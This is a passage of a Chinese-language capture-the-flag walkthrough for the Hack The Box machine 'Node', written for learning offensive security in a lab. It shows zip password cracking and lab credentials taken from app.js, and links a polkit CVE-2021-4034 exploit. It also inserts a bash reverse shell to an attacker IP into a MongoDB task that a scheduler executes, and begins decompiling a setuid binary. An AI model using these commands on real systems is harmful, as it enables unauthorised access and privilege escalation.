&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">┌──&lt;span class="o">(&lt;/span>root㉿kali&lt;span class="o">)&lt;/span>-&lt;span class="o">[&lt;/span>/home/kali/hackbox/Node&lt;span class="o">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">└─# unzip myplace.backup.zip
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Archive: myplace.backup.zip
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> creating: var/www/myplace/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">[&lt;/span>myplace.backup.zip&lt;span class="o">]&lt;/span> var/www/myplace/package-lock.json password:
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>fcrackzip工具枚举得到密码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">┌──&lt;span class="o">(&lt;/span>root㉿kali&lt;span class="o">)&lt;/span>-&lt;span class="o">[&lt;/span>/home/kali/hackbox/Node&lt;span class="o">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u ./myplace.backup.zip
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">PASSWORD FOUND!!!!: &lt;span class="nv">pw&lt;/span> &lt;span class="o">==&lt;/span> magicword
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_zvZsmZtto3_hu674161733e1e07c9018274e98cef4703_85522_532185c8a422fc3372b34aa541ae6f07.webp 400w,
/post/hackbox/node/image/image_zvZsmZtto3_hu674161733e1e07c9018274e98cef4703_85522_4e3c7e41c501ca87306460b6cfa57a26.webp 760w,
/post/hackbox/node/image/image_zvZsmZtto3_hu674161733e1e07c9018274e98cef4703_85522_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_zvZsmZtto3_hu674161733e1e07c9018274e98cef4703_85522_532185c8a422fc3372b34aa541ae6f07.webp"
width="818"
height="518"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="通过appjs发现了-mark-ssh登录密码5ayrft73vtfpc84k">通过app.js发现了 mark ssh登录密码&lt;code>5AYRft73VtFpc84k&lt;/code>&lt;/h3>
&lt;p>mongodb标准 URI 连接语法：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">mongodb://&lt;span class="o">[&lt;/span>username:password@&lt;span class="o">]&lt;/span>host1&lt;span class="o">[&lt;/span>:port1&lt;span class="o">][&lt;/span>,host2&lt;span class="o">[&lt;/span>:port2&lt;span class="o">]&lt;/span>,...&lt;span class="o">[&lt;/span>,hostN&lt;span class="o">[&lt;/span>:portN&lt;span class="o">]]][&lt;/span>/&lt;span class="o">[&lt;/span>database&lt;span class="o">][&lt;/span>?options&lt;span class="o">]]&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_Pu5_ykCiIm_hu34a1d97defb2112e5e3a29b41afb77d7_73537_e5e5c4f328b3f09d3f58fc53a64d3166.webp 400w,
/post/hackbox/node/image/image_Pu5_ykCiIm_hu34a1d97defb2112e5e3a29b41afb77d7_73537_4c4c7d89cd67f59d23613c0145d3af42.webp 760w,
/post/hackbox/node/image/image_Pu5_ykCiIm_hu34a1d97defb2112e5e3a29b41afb77d7_73537_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_Pu5_ykCiIm_hu34a1d97defb2112e5e3a29b41afb77d7_73537_e5e5c4f328b3f09d3f58fc53a64d3166.webp"
width="1032"
height="625"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>ssh mark&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_c-lKXm-O5G_hubd34b5f2a540748418ebda5f7ebd5751_73981_b27034d6698e0086be79294c022d3abd.webp 400w,
/post/hackbox/node/image/image_c-lKXm-O5G_hubd34b5f2a540748418ebda5f7ebd5751_73981_7b4e49ced895bdea47ed03273531ddb0.webp 760w,
/post/hackbox/node/image/image_c-lKXm-O5G_hubd34b5f2a540748418ebda5f7ebd5751_73981_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_c-lKXm-O5G_hubd34b5f2a540748418ebda5f7ebd5751_73981_b27034d6698e0086be79294c022d3abd.webp"
width="916"
height="744"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="polkit提权一步到位">polkit提权一步到位：&lt;/h3>
&lt;p>===============================================================&lt;/p>
&lt;p>简单一点直接polkit提权&lt;code> CVE-2021-4034&lt;/code> 到root&lt;/p>
&lt;p>&lt;a href="https://github.com/dadvlingd/-CVE-2021-4034" target="_blank" rel="noopener">https://github.com/dadvlingd/-CVE-2021-4034&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_-L17SGBxsc_hu3015d886aac7e36b2a9e26531508104a_16160_e8cd691a14a59609ff370948c5b6631e.webp 400w,
/post/hackbox/node/image/image_-L17SGBxsc_hu3015d886aac7e36b2a9e26531508104a_16160_74d083f0885308a122e17ae4a6563803.webp 760w,
/post/hackbox/node/image/image_-L17SGBxsc_hu3015d886aac7e36b2a9e26531508104a_16160_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_-L17SGBxsc_hu3015d886aac7e36b2a9e26531508104a_16160_e8cd691a14a59609ff370948c5b6631e.webp"
width="747"
height="157"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>===============================================================&lt;/p>
&lt;h3 id="常规提权">常规提权：&lt;/h3>
&lt;p>因为&lt;code>mark&lt;/code>没权限读flag，所以要先提权到&lt;code>tom&lt;/code>，再提权到&lt;code>root&lt;/code>才能拿到&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_jIc3CAXsqF_hueae97230c52b770a7c5d1c652f5b0b5f_16823_23a95d438491bc2cfec515390ddb831e.webp 400w,
/post/hackbox/node/image/image_jIc3CAXsqF_hueae97230c52b770a7c5d1c652f5b0b5f_16823_4cad60fc43e88b2e32b3acdee51a411b.webp 760w,
/post/hackbox/node/image/image_jIc3CAXsqF_hueae97230c52b770a7c5d1c652f5b0b5f_16823_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_jIc3CAXsqF_hueae97230c52b770a7c5d1c652f5b0b5f_16823_23a95d438491bc2cfec515390ddb831e.webp"
width="639"
height="156"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h4 id="提权到tom">提权到tom&lt;/h4>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ps -auxww
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>只有两个进程是tom运行的&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">/usr/bin/node /var/www/myplace/app.js
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/usr/bin/node /var/scheduler/app.js
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_suudpbb_em_hu57163742c5fc6e70538d1d864bba562a_106177_d107a798be0c5987f0f64bf650d93918.webp 400w,
/post/hackbox/node/image/image_suudpbb_em_hu57163742c5fc6e70538d1d864bba562a_106177_b0bc4a701e8760cf741def2dcd5dbf1a.webp 760w,
/post/hackbox/node/image/image_suudpbb_em_hu57163742c5fc6e70538d1d864bba562a_106177_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_suudpbb_em_hu57163742c5fc6e70538d1d864bba562a_106177_d107a798be0c5987f0f64bf650d93918.webp"
width="1277"
height="516"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>/var/scheduler/app.js&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-javascript" data-lang="javascript">&lt;span class="line">&lt;span class="cl">&lt;span class="kr">const&lt;/span> &lt;span class="nx">exec&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">require&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;child_process&amp;#39;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">exec&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kr">const&lt;/span> &lt;span class="nx">MongoClient&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">require&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;mongodb&amp;#39;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">MongoClient&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kr">const&lt;/span> &lt;span class="nx">ObjectID&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">require&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;mongodb&amp;#39;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">ObjectID&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kr">const&lt;/span> &lt;span class="nx">url&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&amp;amp;authSource=scheduler&amp;#39;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nx">MongoClient&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">connect&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">url&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="kd">function&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">error&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">db&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">error&lt;/span> &lt;span class="o">||&lt;/span> &lt;span class="o">!&lt;/span>&lt;span class="nx">db&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">console&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">log&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;[!] Failed to connect to mongodb&amp;#39;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">setInterval&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">function&lt;/span> &lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">db&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">collection&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;tasks&amp;#39;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">find&lt;/span>&lt;span class="p">().&lt;/span>&lt;span class="nx">toArray&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">function&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">error&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">docs&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="o">!&lt;/span>&lt;span class="nx">error&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nx">docs&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">docs&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">forEach&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">function&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">doc&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">doc&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">console&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">log&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Executing task &amp;#39;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="nx">doc&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">_id&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s1">&amp;#39;...&amp;#39;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">exec&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">doc&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">cmd&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">db&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">collection&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;tasks&amp;#39;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">deleteOne&lt;/span>&lt;span class="p">({&lt;/span> &lt;span class="nx">_id&lt;/span>&lt;span class="o">:&lt;/span> &lt;span class="k">new&lt;/span> &lt;span class="nx">ObjectID&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">doc&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">_id&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">});&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">});&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">else&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">error&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nx">console&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">log&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Something went wrong: &amp;#39;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="nx">error&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">});&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">},&lt;/span> &lt;span class="mi">30000&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">});&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>该脚本连接mongo的scheduler数据库，每30秒执行一次。&lt;/p>
&lt;p>代码解读：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">1.从tasks集合&lt;span class="o">(&lt;/span>类似sql中的表&lt;span class="o">)&lt;/span>中取出字符，
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">2.将每个字符传递给exec&lt;span class="o">()&lt;/span>执行命令,然后删除这个字符
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">3.30秒后再循环执行。
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>那么只要修改&lt;code>mongo&lt;/code>数据库对应的文档(字段)为&lt;code>exp&lt;/code>，然后&lt;code>tom&lt;/code>用户自动执行/var/scheduler/app.js去读取&lt;code>mongo&lt;/code>被修改的文档，执行命令反弹&lt;code>tom shell&lt;/code>即可提权成功&lt;/p>
&lt;p>执行过程如下：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">show collections
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">db.tasks.find&lt;span class="o">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">db.tasks.insert&lt;span class="o">({&lt;/span>&lt;span class="s2">&amp;#34;cmd&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;bash -c &amp;#39;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.16.14/2333 0&amp;gt;&amp;amp;1&amp;#39;&amp;#34;&lt;/span>&lt;span class="o">})&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_h23tlwJCDg_hu6581fa4a787a8b0ccc7802d8107d4bed_47258_5b39496cd290ce5d6b326c858b20ed75.webp 400w,
/post/hackbox/node/image/image_h23tlwJCDg_hu6581fa4a787a8b0ccc7802d8107d4bed_47258_0404291e762eefd70deb53a0b923dced.webp 760w,
/post/hackbox/node/image/image_h23tlwJCDg_hu6581fa4a787a8b0ccc7802d8107d4bed_47258_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_h23tlwJCDg_hu6581fa4a787a8b0ccc7802d8107d4bed_47258_5b39496cd290ce5d6b326c858b20ed75.webp"
width="1148"
height="221"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>30秒后监听的端口收到shell，成功提权到&lt;code>tom&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_j0yJ32N9yS_hucd11d36e3385c4b56746ab4a4653bc3e_40704_7860192869c096e741b32dd984100202.webp 400w,
/post/hackbox/node/image/image_j0yJ32N9yS_hucd11d36e3385c4b56746ab4a4653bc3e_40704_453a63ec65d3b53a43e015180dec0efe.webp 760w,
/post/hackbox/node/image/image_j0yJ32N9yS_hucd11d36e3385c4b56746ab4a4653bc3e_40704_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_j0yJ32N9yS_hucd11d36e3385c4b56746ab4a4653bc3e_40704_7860192869c096e741b32dd984100202.webp"
width="1282"
height="336"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h4 id="提权到root">提权到root&lt;/h4>
&lt;p>看了下group组，发现&lt;code>root&lt;/code>居然属于&lt;code>admin&lt;/code>组&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_rRCsMLVHVu_hua5819e5ea4b942006c2962c2cc3f0dcf_5809_4f2d999c671102f17d2ed23cce4d178b.webp 400w,
/post/hackbox/node/image/image_rRCsMLVHVu_hua5819e5ea4b942006c2962c2cc3f0dcf_5809_d1ca55c8d1c2941d532b9c5cebc31753.webp 760w,
/post/hackbox/node/image/image_rRCsMLVHVu_hua5819e5ea4b942006c2962c2cc3f0dcf_5809_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_rRCsMLVHVu_hua5819e5ea4b942006c2962c2cc3f0dcf_5809_4f2d999c671102f17d2ed23cce4d178b.webp"
width="515"
height="88"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>/etc/group字段解析&lt;/p>
&lt;p>&lt;a href="https://blog.51cto.com/dlican/3741615" target="_blank" rel="noopener">https://blog.51cto.com/dlican/3741615&lt;/a>&lt;/p>
&lt;p>发现只有&lt;code>/usr/local/bin/backup&lt;/code>文件属于&lt;code>admin&lt;/code>组&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_4QRfUTI-Dl_hu5b5f306522fac3bd4f77baa4c612338b_9075_186905d1c8ad85692e5976f25401c8b7.webp 400w,
/post/hackbox/node/image/image_4QRfUTI-Dl_hu5b5f306522fac3bd4f77baa4c612338b_9075_483aee18bff7bd0bef9dcffaa71a21cb.webp 760w,
/post/hackbox/node/image/image_4QRfUTI-Dl_hu5b5f306522fac3bd4f77baa4c612338b_9075_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_4QRfUTI-Dl_hu5b5f306522fac3bd4f77baa4c612338b_9075_186905d1c8ad85692e5976f25401c8b7.webp"
width="959"
height="68"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;code>/usr/local/bin/backup&lt;/code>是32位二进制可执行文件&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">tom@node:/$ file /usr/local/bin/backup
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/usr/local/bin/backup: setuid ELF 32-bit LSB executable, Intel 80386, version &lt;span class="m">1&lt;/span> &lt;span class="o">(&lt;/span>SYSV&lt;span class="o">)&lt;/span>, dynamically linked, interpreter /lib/ld-linux.so.2, &lt;span class="k">for&lt;/span> GNU/Linux 2.6.32, BuildID&lt;span class="o">[&lt;/span>sha1&lt;span class="o">]=&lt;/span>343cf2d93fb2905848a42007439494a2b4984369, not stripped
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>通过查找运行的nodejs代码，发现&lt;code>/var/www/myplace/app.js&lt;/code>调用了&lt;code>/usr/local/bin/backup&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">find / -name &lt;span class="s1">&amp;#39;*.js&amp;#39;&lt;/span> 2&amp;gt;/dev/null&lt;span class="p">|&lt;/span>xargs grep &lt;span class="s1">&amp;#39;/usr/local/bin/backup&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_Vnc-dcLcIN_hu918344c21b012dcbd829bb59f11bdab3_14561_2c505bad7b1acade3cf556351a7ffdb7.webp 400w,
/post/hackbox/node/image/image_Vnc-dcLcIN_hu918344c21b012dcbd829bb59f11bdab3_14561_276c3b4a09a07708a4e85e3d5666613b.webp 760w,
/post/hackbox/node/image/image_Vnc-dcLcIN_hu918344c21b012dcbd829bb59f11bdab3_14561_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_Vnc-dcLcIN_hu918344c21b012dcbd829bb59f11bdab3_14561_2c505bad7b1acade3cf556351a7ffdb7.webp"
width="1090"
height="82"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>通过&lt;code>/var/www/myplace/app.js&lt;/code>得知&lt;code>/usr/local/bin/backup&lt;/code>需要传入三位参数，&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">/usr/local/bin/backup -q backup_key, __dirname
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>继续分析，通过IDA反编译&lt;code>/usr/local/bin/backup&lt;/code>得到代码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-c" data-lang="c">&lt;span class="line">&lt;span class="cl">&lt;span class="kt">int&lt;/span> &lt;span class="kr">__cdecl&lt;/span> &lt;span class="nf">main&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kt">int&lt;/span> &lt;span class="n">argc&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="k">const&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="o">**&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="k">const&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="o">**&lt;/span>&lt;span class="n">envp&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">__uid_t&lt;/span> &lt;span class="n">v3&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// eax
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="n">__pid_t&lt;/span> &lt;span class="n">v4&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// esi
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">time_t&lt;/span> &lt;span class="n">v5&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// ebx
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">clock_t&lt;/span> &lt;span class="n">v6&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// eax
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">unsigned&lt;/span> &lt;span class="kt">int&lt;/span> &lt;span class="n">v7&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// eax
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">command&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">1500&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+1h] [ebp-10B1h] BYREF
